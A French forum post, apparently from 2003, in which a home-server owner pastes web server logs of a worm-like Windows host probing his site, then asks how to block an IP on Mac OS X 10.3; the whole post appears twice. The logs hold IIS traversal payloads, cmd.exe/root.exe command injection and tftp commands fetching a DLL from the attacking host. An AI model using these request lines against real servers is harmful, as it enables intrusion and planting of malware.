salut,
depuis que j'ai l'adsl j'ai mis mon site sur mon g4 et je peut donc voir dans les logs tous les braves gens qui se connectent, en général ma famille, mais assez souvent un windobeux qui essai d'ouvrir des fichier de windows, je vous liste si après les échantillons de commande qu'il essai de faire le brave:
<font class="small">Code:</font><hr /><pre>
81.220.156.231 - - [01/Nov/2003:09:13:41 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20d:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/httpodbc.dll HTTP/1.0" 404 304
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:14:00 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:10:43:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:38 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:39 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:52:52 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:56 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:58 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:53:09 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:53:19 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:57 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:06 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:21:26:08 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:09 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:10 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:21:26:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438
</pre><hr />
et d'ailleur j'en profite pour poser la question avant d'aller me pommé dans l'aide: est ce qu'il est possible de bloquer l'accés à une certaine adresse ip avec MacOsx 10.3, mais pa le serveur.
depuis que j'ai l'adsl j'ai mis mon site sur mon g4 et je peut donc voir dans les logs tous les braves gens qui se connectent, en général ma famille, mais assez souvent un windobeux qui essai d'ouvrir des fichier de windows, je vous liste si après les échantillons de commande qu'il essai de faire le brave:
<font class="small">Code:</font><hr /><pre>
81.220.156.231 - - [01/Nov/2003:09:13:41 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:42 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:43 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20d:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /c/httpodbc.dll HTTP/1.0" 404 304
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
81.220.156.231 - - [01/Nov/2003:09:13:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:52 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361
81.220.156.231 - - [01/Nov/2003:09:13:53 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
81.220.156.231 - - [01/Nov/2003:09:13:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:09:14:00 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
81.220.156.231 - - [01/Nov/2003:10:43:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:38 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:43:39 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:52:52 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:56 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:52:58 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:10:53:09 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:10:53:19 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:25:57 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:06 +0100] "GET /scripts/httpodbc.dll HTTP/1.0" 200 4135
81.220.156.231 - - [01/Nov/2003:21:26:08 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:09 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2081.220.156.231%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438
81.220.156.231 - - [01/Nov/2003:21:26:10 +0100] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 308
81.220.156.231 - - [01/Nov/2003:21:26:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 438
</pre><hr />
et d'ailleur j'en profite pour poser la question avant d'aller me pommé dans l'aide: est ce qu'il est possible de bloquer l'accés à une certaine adresse ip avec MacOsx 10.3, mais pa le serveur.